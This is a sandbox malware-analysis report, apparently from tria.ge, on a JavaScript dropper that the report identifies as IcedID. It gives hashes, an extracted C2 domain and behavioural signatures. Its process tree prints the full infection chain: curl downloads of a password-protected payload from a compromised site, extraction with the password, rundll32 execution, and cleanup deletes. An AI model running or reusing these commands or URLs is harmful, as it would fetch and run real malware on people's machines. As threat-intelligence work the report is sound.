Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
14/10/2023, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
Document_09_13_927.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Document_09_13_927.js
Resource
win10v2004-20230915-en
General
-
Target
Document_09_13_927.js
-
Size
43KB
-
MD5
03677c4079fafd6413c5552f3d6da926
-
SHA1
28f14a816b7fb22630c7d59af9d404f51dab4f69
-
SHA256
32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010
-
SHA512
debf24ab43ea09c567afe47e5289fad62fb19e7d8d1d6401e466feec1f1da84e3652e06854750e0911cdeead48b7a86bfeb74e440ca43bbda9588162da9875fc
-
SSDEEP
384:eo/1qDp3h548/pzFhb2uhK2U2yoWmfrL4tuEsSRqQ1SDIJnjOsetOI88s8vr6z1d:/qHLi+lIR6J2kzqpaJfs9
Malware Config
Extracted
icedid
1638996626
minutozhart.online
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 2040 neque.j -
Loads dropped DLL 1 IoCs
pid Process 4332 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 3340 Process not Found 3340 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4332 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeRestorePrivilege 2040 neque.j Token: 35 2040 neque.j Token: SeSecurityPrivilege 2040 neque.j Token: SeSecurityPrivilege 2040 neque.j -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3152 wrote to memory of 576 3152 wscript.exe 82 PID 3152 wrote to memory of 576 3152 wscript.exe 82 PID 3152 wrote to memory of 4644 3152 wscript.exe 84 PID 3152 wrote to memory of 4644 3152 wscript.exe 84 PID 3152 wrote to memory of 3228 3152 wscript.exe 86 PID 3152 wrote to memory of 3228 3152 wscript.exe 86 PID 3228 wrote to memory of 4128 3228 cmd.exe 88 PID 3228 wrote to memory of 4128 3228 cmd.exe 88 PID 3152 wrote to memory of 4588 3152 wscript.exe 92 PID 3152 wrote to memory of 4588 3152 wscript.exe 92 PID 3152 wrote to memory of 788 3152 wscript.exe 94 PID 3152 wrote to memory of 788 3152 wscript.exe 94 PID 788 wrote to memory of 2040 788 cmd.exe 96 PID 788 wrote to memory of 2040 788 cmd.exe 96 PID 788 wrote to memory of 2040 788 cmd.exe 96 PID 3152 wrote to memory of 1276 3152 wscript.exe 97 PID 3152 wrote to memory of 1276 3152 wscript.exe 97 PID 3152 wrote to memory of 4280 3152 wscript.exe 99 PID 3152 wrote to memory of 4280 3152 wscript.exe 99 PID 3152 wrote to memory of 1944 3152 wscript.exe 101 PID 3152 wrote to memory of 1944 3152 wscript.exe 101 PID 3152 wrote to memory of 4332 3152 wscript.exe 103 PID 3152 wrote to memory of 4332 3152 wscript.exe 103 PID 3152 wrote to memory of 2696 3152 wscript.exe 104 PID 3152 wrote to memory of 2696 3152 wscript.exe 104
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js"2⤵PID:576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"2⤵PID:4644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\curl.execurl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location3⤵PID:4128
-
-
-
C:\Windows\System32\curl.exe"C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\neque.j"2⤵PID:4588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" > "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i""2⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Users\Admin\AppData\Local\Temp\neque.j"C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\neque.j"2⤵PID:1276
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"2⤵PID:4280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i" "quia.j"2⤵PID:1944
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\quia.j", scab /k abebas5312⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"2⤵PID:2696
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
571KB
MD558fc6de6c4e5d2fda63565d54feb9e75
SHA10586248c327d21efb8787e8ea9f553ddc03493ec
SHA25672c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b
SHA512e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df
-
Filesize
571KB
MD558fc6de6c4e5d2fda63565d54feb9e75
SHA10586248c327d21efb8787e8ea9f553ddc03493ec
SHA25672c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b
SHA512e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df
-
Filesize
200KB
MD5396f81c0274b21d8474a3f39f5188650
SHA1426da78e8db7c72f83a02696140b79190f2ee920
SHA256fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad
SHA51277fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d
-
Filesize
184B
MD569d466581b9f52f28ca830ea196000d1
SHA1e28316b3d54e97322014e898b4025139286c014c
SHA2564d0fa867e22ced070e431af28666e0e2caaa1822b61f0424610a903e73f87118
SHA512b8cdbcafb5e8b2b12fd2bb3041ca4bbd2f533b1069911cea355e647044ee3cd795671fba486f44125835d60a93876485d6784db31eb080707daeac105922844e
-
Filesize
200KB
MD5396f81c0274b21d8474a3f39f5188650
SHA1426da78e8db7c72f83a02696140b79190f2ee920
SHA256fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad
SHA51277fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d
-
Filesize
81KB
MD56d78b958989a6ad56aa0d3a8f8ac821e
SHA15de1912c211a54cebf38ac6d0ecfc9ff0c645a87
SHA256161e14ad8be2cf07c1d0dcfcad5db86e8d450e1b260970a614a7e2ff180ef1e7
SHA512e099f9a0d3cece1259a6029f6950b20ced070361f0ea00ff19d3404429f9362724087b42447a99c090ce042e5fe6eef4941aa7bfbd671222c6e6316cffe1ab55